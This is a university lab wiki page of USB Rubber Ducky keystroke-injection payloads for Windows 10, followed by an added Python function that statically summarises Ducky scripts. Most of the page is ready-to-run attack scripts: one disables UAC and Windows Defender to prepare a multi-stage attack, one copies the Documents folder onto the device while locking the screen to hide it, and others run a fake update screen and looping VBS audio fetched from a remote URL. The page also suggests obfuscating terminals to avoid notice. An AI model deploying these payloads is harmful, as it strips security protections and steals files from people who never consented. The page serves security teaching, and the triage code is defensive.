USB Rubber Ducky: Payloads

From Embedded Lab Vienna for IoT & Security
Revision as of 06:18, 8 July 2022 by BVogler (talk | contribs) (minor corrections)

Summary

This documentation shows examples of using the USB Rubber Ducky on Windows 10 hosts. Many ready-made Ducky Scripts can be found at:

Requirements

Description

All scripts start with DELAY 3000, a delay of 3000 ms (3 s), to make sure that the target PC has time to set up the HID driver. This can potentially be reduced to DELAY 1000 depending on the target host. The scripts could be further improved by adding obfuscation methods to the code. Terminal windows can be changed in colour and size to make them less obvious and much harder to read. USB Rubber Ducky can also be used to play harmless pranks on your colleagues and friends. Just be sure to clue them in beforehand and don’t let them panic.

Hello World!

Firmware: Duck (Original)

As in any programming language, a basic hello world is a good way to get to know the basic functionality of the system. The following code makes a Windows PC open Notepad, write “Hello World!” in large letters and save the file to the default directory.

DELAY 3000
GUI d
DELAY 2000
GUI r
DELAY 500
STRING c:\windows\notepad.exe
ENTER
DELAY 1000
ALT o
STRING f
TAB
TAB
STRING 100
ENTER
STRING Hello World!
CTRL s
STRING totallynotavirus.txt
ENTER

Disable Windows Defender

Firmware: Duck (Original)

This script first disables Windows User Account Control and then disables all functions of Windows Defender. This could potentially be used to prepare for a second stage of a multi-stage attack. It makes heavy use of menu navigation (arrow keys, tabs) and the Windows 10 Search menu. The values of the DELAY commands could be further reduced on a fast target host. Note that the script leaves no open windows after concluding its actions.

DELAY 3000
REM Disabling User Account Control
CTRL ESC
DELAY 200
STRING uac
DELAY 200
ENTER
DELAY 500
LEFT
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 500
LEFT
DELAY 200
ENTER
DELAY 1000
REM Disabling Windows Defender
CTRL ESC
DELAY 200
STRING virus pro
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
SPACE
DELAY 200
ALT F4

Copy Documents Folder to Ducky

Firmware: Twin Duck

Before using this script, the USB Rubber Ducky must be updated with the Twin Duck firmware. With this firmware, the Rubber Ducky acts both as a HID keyboard and as a USB storage device. The script uses the Windows Run dialog to open the Documents directory and copies all its contents to the storage portion of the Ducky. Note that this script assumes that the storage device will be assigned the drive letter D and must be adjusted if reconnaissance shows another letter would be more likely. The script ends by locking the screen to better hide the copying process.

DELAY 3000
GUI d
DELAY 300
GUI r
DELAY 100
STRING documents
DELAY 100
ENTER
DELAY 100
CTRL a
DELAY 100
CTRL c
DELAY 100
ALT F4
DELAY 100
GUI r
DELAY 300
STRING d:\
DELAY 100
ENTER
DELAY 100
CTRL v
DELAY 100
GUI D
DELAY 100
GUI l

Fake Update Screen

Firmware: Duck (Original)

This script opens a website that fakes the Windows update screen in the system’s default internet browser and sets it to full-screen mode. It can’t be easily exited by hitting the Escape key, and hitting the Enter key results in a fake bluescreen.

DELAY 3000
GUI d
DELAY 200
GUI r
DELAY 200
STRING https://www.fakeupdate.net/win10ue/
ENTER
DELAY 500
F11

Maximum Volume Autoplay Audio

Firmware: Duck (Original)

This script showcases how Ducky Script can use the console to create Visual Basic Script files (*.vbs) that run endless loops of code. It uses the command copy con to create two script files. The first script creates a Windows Media Player object that plays a sound file from start to finish from a provided online source. The second script creates a Windows Script Host Shell object that sends the “Volume Up” command in an endless loop. The only way to end these scripts is by using the task manager or by restarting the system.

DELAY 3000
GUI d
DELAY 200
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 500
STRING del %tmp%\rickyou.vbs
ENTER
DELAY 200
STRING del %tmp%\volup.vbs
ENTER
DELAY 200
STRING cd %tmp% && copy con rickyou.vbs
ENTER
STRING While true
ENTER
STRING Dim oPlayer
ENTER
STRING Set oPlayer = CreateObject("WMPlayer.OCX")
ENTER
STRING oPlayer.URL = "http://tinyurl.com/s63ve48"
ENTER
STRING oPlayer.controls.play
ENTER
STRING While oPlayer.playState <> 1 ' 1 = Stopped
ENTER
STRING WScript.Sleep 100
ENTER
STRING Wend
ENTER
STRING oPlayer.close
ENTER
STRING Wend
ENTER
DELAY 100
CTRL z
ENTER
STRING copy con volup.vbs
ENTER
STRING do
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.SendKeys(chr(&hAF))
ENTER
STRING loop
ENTER
CTRL z
ENTER
STRING start rickyou.vbs && volup.vbs
ENTER
STRING exit
ENTER
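
The scripts above share a few patterns: DELAY pauses in milliseconds, text typed into the Run dialog after GUI r, URLs inside STRING lines, and files created with copy con. The following is an added example, not part of the original page, that statically summarises a Ducky Script file found on a device so it can be reviewed without running it; the function and field names and the sample script are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

URL_RE = re.compile(r"https?://[^\s\"']+")
COPY_CON_RE = re.compile(r"copy con (\S+)", re.IGNORECASE)

@dataclass
class Summary:
    total_delay_ms: int = 0                            # sum of all DELAY arguments
    keystroke_lines: int = 0                           # lines that send keys to the host
    run_dialog: list = field(default_factory=list)     # text typed right after GUI r
    urls: list = field(default_factory=list)           # URLs inside typed strings
    files_written: list = field(default_factory=list)  # targets of "copy con"

def triage(script: str) -> Summary:
    """Summarise a Ducky Script file without encoding or executing it."""
    s, after_run = Summary(), False
    for raw in script.splitlines():
        cmd, _, arg = raw.strip().partition(" ")
        cmd, arg = cmd.upper(), arg.strip()
        if cmd in ("", "REM"):              # blank line or comment: sends nothing
            continue
        if cmd == "DELAY":                  # pause in ms; non-numeric values are ignored
            s.total_delay_ms += int(arg) if arg.isdigit() else 0
            continue
        s.keystroke_lines += 1
        if cmd == "STRING":
            if after_run:                   # first text typed into the Run dialog
                s.run_dialog.append(arg)
            s.urls.extend(URL_RE.findall(arg))
            s.files_written.extend(COPY_CON_RE.findall(arg))
        after_run = cmd in ("GUI", "WINDOWS") and arg.lower() == "r"
    return s

# Constructed sample script (not one of the payloads from this page).
SAMPLE = """\
DELAY 3000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 500
STRING cd %tmp% && copy con demo.vbs
ENTER
STRING WScript.Echo "https://example.test/a"
ENTER
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

For the sample, the summary shows 3700 ms of total delay, cmd as the Run dialog entry, one URL and one file created through copy con.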

Used Hardware

  • USB Rubber Ducky
  • Windows 10 PC
  • Ubuntu Linux 20.04 Virtual Machine

References